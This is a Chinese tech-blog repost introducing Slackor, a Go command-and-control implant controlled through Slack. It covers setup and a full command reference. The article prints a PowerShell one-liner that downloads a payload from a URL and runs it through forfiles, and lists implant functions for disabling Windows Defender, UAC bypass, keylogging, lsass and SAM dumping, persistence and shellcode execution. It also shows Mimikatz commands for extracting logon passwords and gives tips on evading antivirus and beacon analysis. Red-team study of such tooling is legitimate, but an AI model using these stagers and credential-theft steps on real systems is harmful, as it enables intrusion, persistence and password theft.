Loading [MathJax]/jax/input/TeX/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
社区首页 >专栏 >Slackor:Go语言写的一款C&C服务器

Slackor:Go语言写的一款C&C服务器

作者头像
FB客服
发布于 2019-09-17 05:06:30
发布于 2019-09-17 05:06:30
1.8K00
代码可运行
举报
文章被收录于专栏:FreeBufFreeBuf
运行总次数:0
代码可运行

该项目的灵感来自Gcat和Twittor。

编译

注意:服务器是用Python 3编写的

为此您需要准备

1.Slack工作区

2.并为slack应用设置以下权限:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
channels:read
channels:history
channels:write
files:write:user
files:read
创建一个机器人
代码语言:javascript
代码运行次数:0
运行
复制

这个仓库包含五个文件:

install.sh 安装依赖 setup.py 用于创建通道,数据库的脚本 agent.py 用于生成后门的脚本 server.py Slackor服务器,在Linux上运行 agent.go golang后门 requirements.txt Python依赖

如何开始:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
go get github.com/Coalfire-Research/Slackor

cd $GOPATH/src/github.com/Coalfire-Research/Slackor

install.sh

setup.py
代码语言:javascript
代码运行次数:0
运行
复制

为您的应用程序提供OAuth token

成功运行脚本后,脚本将在dist/目录中创建几个文件:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
agent.windows.exe:Windows 64位二进制文件
agent.upx.exe:Windows 64位二进制文件,UPX打包
agent.darwin:macOS 64位二进制文件
agent.32.linux:Linux 32位二进制文件
agent.64.linux:Linux 64位二进制文件
代码语言:javascript
代码运行次数:0
运行
复制

server.pyLinux主机上启动后,

运行stager模块以生成单线程和其他dropper。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
powershell.exe iwr [URL] -o C:\Users\Public\[NAME].exe; forfiles.exe /p c:\windows\system32 /m svchost.exe /c C:\Users\Public\[NAME]; timeout 2; del C:\Users\Public\[NAME].exe
代码语言:javascript
代码运行次数:0
运行
复制

这将执行InvokeWebRequest(PS v.3 +)以下载payload,使用LOLBin执行它

用法

输入help或按[TAB]查看可用命令列表。输入help [COMMAND]以查看该命令的描述。

Slackor

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
help - 显示帮助菜单
interact - 与代理交互
list - 列出所有已注册的代理商
remove - 杀死并删除代理
revive - 向所有代理发送信号以重新注册服务器
stager - 生成单行程序以下载执行植
quit - 退出程序
wipefiles - 从Slack中删除所有上传的文件
代码语言:javascript
代码运行次数:0
运行
复制

代理进入后,您可以与其进行交互。使用interact [AGENT]进入代理提示符。输入help或按[TAB]查看可用命令列表。

Slackor:AGENT

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
- 常用命令
  - back  - 返回主菜单
  - beacon - 更改代理每次登记之间的时间(默认为5秒)
  - download- 将代理程序中的文件下载到Slackor服务器
  - help - 显示帮助菜单
  - kill  - 杀死进程
  - sleep - 代理睡眠一次时间(以秒为单位输入时间)
  - sysinfo- 显示当前用户,操作系统版本,系统体系结构和CPU核心数
  - upload - 从Slackor服务器上传文件到代理
  - wget - 通过HTTP / HTTPS下拉任意文件
- Windows命令
  - bypassuac - 生成代理
  - cleanup - 删除持久化操作
  - clipboard - 检索剪贴板的内容
  - defanger - 去除Windows Defender
  - duplicate - 使代理生成另一个自身调用
  - getsystem - 将代理生成为NTAUTHORITY / SYSTEM
  - keyscan - 在代理上启动键盘记录器
  - minidump - 从lsass.exe转储内存并下载
  - persist - 通过在ADS中植入二进制文件来创建持久性
  - samdump - 尝试转储SAM文件以进行脱机哈希提取
  - screenshot - 获取桌面的屏幕截图
  - shellcode- 执行x64原始shellcode
- Mac命令
- Linux命令
  - screenshot - 获取桌面的屏幕截图

OPSEC注意事项

除Slack的TLS传输加密外,命令输出和下载的文件都是AES加密的。

模块将在执行写入磁盘的任务之前发出警告。执行shell命令时,请注意cmd.exe/ bash将执行。这可以在主机上监控。以下是几个不执行cmd.exe/的OPSEC安全命令bash

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
- cat - 打印文件内容
- cd - 更改目录
- find - 搜索目录文件名
- getip - 获取外部IP地址(发出DNS请求)
- hostname - 显示主机的名称
- ifconfig - 显示接口信息
- ls - 列出目录内容
- mkdir - 创建目录
- pwd - 打印当前工作目录
- rm - 删除文件
- rmdir - 删除目录
- whoami/getuid - 打印当前用户

未来的目标

1.DOSfuscation 2.反复加载DLL / PE - https://github.com/vyrus001/go-mimikatz 3.在内存中执行C#程序集 - https://github.com/lesnuages/go-execute-assembly 4.源代码混淆https://github.com/unixpickle/gobfuscate

常问问题

这对红队/测试使用是否安全?

是的,考虑到一些条件。当数据在传输过程中加密时,代理包含用于解密的密钥。获取代理副本的任何人都可以对其进行反向工程并提取API密钥和AES密钥。任何妥协或以其他方式获得对工作区的访问权限的人都能够检索其中的所有数据。因此,不建议针对多个组织重用基础结构。

Mimikatz怎么样?

植入物没有内存中的密码转储功能。如果您需要logonPasswords,可以尝试以下操作:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
(Slackor: AGENT)minidump
代码语言:javascript
代码运行次数:0
运行
复制

这将使用Pypykatz自动提取密码。或者,您可以在Windows上使用Mimikatz。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
>mimikatz.exe
mimikatz # sekurlsa::Minidump lsassdump.dmp
mimikatz # sekurlsa::logonPasswords

它是跨平台的吗?

它的跨平台支持有限。它尚未在可以运行的所有系统上进行全面测试。该服务器旨在在Kali Linux上运行。代理程序是针对Windows,Mac和Linux编译的,但主要是使用Windows 10进行测试。代理程序可能会错误处理该代理程序平台不支持的命令(不要尝试对Mac进行小型化)。

它的规模如何?

可伸缩性受Slack API的限制。如果您有多个代理,请考虑增加未使用的信标的信标间隔。

它是否容易受到标准信标分析的影响?

目前,每个信标都内置了20%的抖动,并且可以定制信标时间。只要没有收到新命令,代理登记请求和响应数据包每次大小大致相同。

它被杀软发现!

现在这是开源的,它必然会有问题。我们会尽可能地修复模块,但无法保证这将始终绕过所有AV。

参考来源:GitHub,FB小编周大涛编译,转载请注明来自FreeBuf.COM

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-09-15,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
内网渗透-导出HASH的多种方式
在内网渗透中当我们得到一台高权限用户的身份时,就可以抓取到当前机器上的各类密码。虽然任务要求是导出域hash的方式,但在内网渗透中,获取当前机器的hash也有可能获取到域用户的hash,因此这里也分析一下如何获取当前机器的明文密码。
亿人安全
2024/08/13
4670
内网渗透-导出HASH的多种方式
红队技巧-导出凭据和密码
红队中各种抓取密码凭据的方法,文末彩蛋,内附工具链接,以及我制作的过360的minikatz的版本,各位请享用,最近筹备重新开blog,记录学习计划,不然知识我学完立马就忘了,与大家一起学习!
Gamma实验室
2021/03/10
2.4K0
红队技巧-导出凭据和密码
windows凭证转储(一)
声明:公众号大部分文章来自团队核心成员和知识星球成员,少部分文章经过原作者授权和其它公众号白名单转载。未经授权,严禁转载,如需转载,请联系开白!
安全小王子
2020/09/24
2K0
windows凭证转储(一)
手把手教你构建自定义的Mimikatz二进制文件
在这篇文章中,我们将教会大家如何通过修改源代码的方式构建自定义的Mimikatz二进制文件,并绕过反病毒/终端检测与响应产品。
FB客服
2020/10/27
9770
手把手教你构建自定义的Mimikatz二进制文件
Mimikatz获取系统密码攻防研究
最新版下载地址:https://github.com/gentilkiwi/mimikatz/releases/download/2.1.1-20180205/mimikatz_trunk.zip
用户1631416
2020/04/08
4.1K0
Mimikatz获取系统密码攻防研究
内网学习笔记 | 密码抓取
Windows 系统一般使用两种方法对用户的密码进行加密处理,在域环境中,用户的密码信息以哈希值的密文形式存储在 ntds.dit 二进制文件中,该文件位于 %SystemRoot%\ntds\ntds.dit 路径下,由于该文件一直被活动目录访问,因此这个文件是被系统禁止读取的。
TeamsSix
2022/09/20
2.3K0
内网学习笔记 | 密码抓取
横向移动
在内网渗透过程中,当得到内网中某一台机器权限后,如果需要进一步的扩大攻击范围,那么这时候就需要进行横向移动,以被攻陷的主机作为跳板,来访问域内其他主机.通过此类攻击手段,最终可能会获得域控制器(DC)的访问权限及重要数据.
鸿鹄实验室
2022/11/02
2.3K0
横向移动
如何使用NanoDump导出LSASS进程数据
NanoDump是一款功能强大的MiniDump转储文件提取工具,在该工具的帮助下,广大研究人员可以轻松转储LSASS进程中的MiniDump数据。
FB客服
2022/06/08
1.6K0
如何使用NanoDump导出LSASS进程数据
Windows密码凭证获取学习
乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
乌鸦安全
2022/08/11
2K0
Windows密码凭证获取学习
Red-Team-Tools开源C2开发后框架列表
APfell是一个跨平台,可识别 OPSEC的红色团队,利用后的C2框架,使用python3,docker,docker-compose和Web浏览器UI构建.它旨在为操作员,管理人员和基于Mac OS和Linux的操作系统上的报告提供协作且用户友好的界面.它包括对多个C2配置文件,多种有效负载类型,Mac OS专有的自动化JavaScript(JXA)和有趣的Chrome扩展有效负载的支持.APfell也映射到我最喜欢的MITER ATT&CK框架.有趣的是,C2框架从知名的恶意软件家族(例如PlugX,Flame等)中获得灵感.
洛米唯熊
2020/03/12
3.2K0
Windows下登录凭证窃取技巧
拿到一台Windows服务器权限,收集各种登录凭证以便扩大战果。本篇分享几个窃取Windows登录凭证的工具和技巧。
Bypass
2020/10/26
2K0
获取Windows系统密码凭证总结
本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集,旨在提高网络安全技术水平为目的,只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如果您对文章内容有疑问,可以尝试加入交流群讨论或留言私信,如有侵权请联系小编处理。
网络安全自修室
2024/03/06
1.1K0
获取Windows系统密码凭证总结
项目实战 | 细节决定成败的渗透测试
个人水平有限,文章若有不足之处,感谢各位大佬批评指正,希望能够与各位师傅分享学习。
黑白天安全
2020/08/27
6930
项目实战 | 细节决定成败的渗透测试
Nimbo-C2:一款功能强大的轻量级C2 框架
Nimbo-C2是一款功能强大的轻量级C2 框架,Nimbo-C2代理支持x64 Windows&Linux操作系统。该工具基于Nim和Python开发,其WIndows端使用了.NET组件。Nim的功能非常强大,但在跟Windows系统交互时使用PowerShell可能会更加简单,因此该工具的部分功能是基于PowerShell实现的。Nimbo-C2的Linux代理更加的精简,只能执行基本命令,其中包括ELF加载(通过memfd技术实现)等。
FB客服
2023/08/08
6910
Nimbo-C2:一款功能强大的轻量级C2 框架
APT29分析报告
APT29是威胁组织,已被归于俄罗斯政府情报组织,APT29至少从2008年开始运作,具有YTTRIUM、The Dukes、Cozy Duke、Cozy Bear、Office Monkeys等别名。主要攻击目标为美国和东欧的一些国家。攻击目的是为了获取国家机密和相关政治利益,包括但不限于政党内机密文件,操控选举等。与APT28,同属于俄罗斯政府的APT28相互独立,但在某种程度上会联合行动。APT29是东欧地区最为活跃的APT组织之一。该APT的许多组件均通过伪造的Intel和AMD数字证书进行签名。
FB客服
2020/02/12
1.9K0
APT29分析报告
绕过基于签名的 AV
基于行为的检测涉及分析代码在执行时的行为,并确定该行为是否表示恶意行为。行为检测的示例是识别进程空心化的使用或CreateRemoteThreadDLL 注入的使用。
Khan安全团队
2022/04/13
1.5K0
【内网安全】Win&Linux&内存离线读取&Hashcat破解&RDP&SSH存储提取
微软为了防止明文密码泄露发布了补丁KB2871997,关闭了Wdigest功能。 当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码, 此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。 2008 R2版本可以抓取明文密码
没事就要多学习
2024/07/18
1220
【内网安全】Win&Linux&内存离线读取&Hashcat破解&RDP&SSH存储提取
Dump LSASS SKill
获取Windows用户的凭证信息是渗透过程中至关重要的一步,如果没有杀软,那么只要有权限想怎么读就怎么读,当有杀软时就得用一些特别的技巧,本篇文章将简单介绍几种之前在Twitter上看到的小技巧,仅供大家参考
Al1ex
2022/09/07
1.3K0
Dump LSASS SKill
什么是渗透_mitotracker deep red
Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!也就是说只要你不重启电脑,就可以通过他获取到登陆密码,只限当前登陆系统!
全栈程序员站长
2022/09/20
6640
什么是渗透_mitotracker deep red
通过 SOCKS 代理 Windows 工具
通过受感染的主机利用 SOCKS 代理来自 Windows 攻击者机器的工具是一个包含一些细微差别和混淆空间的主题。这种细微差别源于将普通网络流量代理到目标网络的协议要求,以及可用于 Windows 以促进通过 SOCKS 代理网络流量的工具(或缺乏工具)。但是,从攻击的角度来看,将现有 Windows 工具和本机实用程序代理到网络中的能力具有重要价值。为此,这篇文章旨在逐步完成:
Khan安全团队
2022/01/19
2.1K0
相关推荐
内网渗透-导出HASH的多种方式
更多 >
领券
社区富文本编辑器全新改版!诚邀体验~
全新交互,全新视觉,新增快捷键、悬浮工具栏、高亮块等功能并同时优化现有功能,全面提升创作效率和体验
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
查看详情【社区公告】 技术创作特训营有奖征文